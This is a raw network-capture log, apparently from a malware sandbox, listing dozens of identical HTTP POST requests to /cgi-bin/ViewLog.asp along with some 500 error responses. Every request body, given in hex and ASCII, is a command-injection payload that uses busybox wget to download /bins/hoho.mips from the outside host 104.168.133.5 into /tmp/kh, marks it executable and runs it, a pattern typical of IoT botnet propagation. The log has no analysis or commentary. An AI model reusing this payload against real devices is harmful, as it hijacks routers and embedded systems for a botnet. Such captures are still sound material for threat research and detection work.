                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              192192.168.2.134778494.242.230.2348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.884664059 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              193192.168.2.133529631.136.100.2478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.943080902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:56.518659115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:57.638633966 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:00.038667917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:04.646766901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.606614113 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:31.782521963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:08.646506071 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              194192.168.2.134337431.200.28.1638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.981509924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              195192.168.2.133976895.86.95.948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:56.117611885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              196192.168.2.135550631.136.116.888080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:57.168693066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:57.734565973 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:58.854556084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:01.318552017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.926616907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:14.886557102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:33.830471039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:10.694426060 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              197192.168.2.135383694.73.64.538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:57.178373098 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              198192.168.2.136091494.121.159.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:57.205569983 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              199192.168.2.133780695.86.68.708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:57.219351053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              200192.168.2.135924431.128.223.568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:57.223378897 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:57.458456039 CET523INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/html; charset=utf-8
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Security-Policy: frame-ancestors 'none'
                                              Strict-Transport-Security: max-age=3600
                                              Content-Length: 130
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              201192.168.2.135904094.111.61.1138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:58.666161060 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.686569929 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
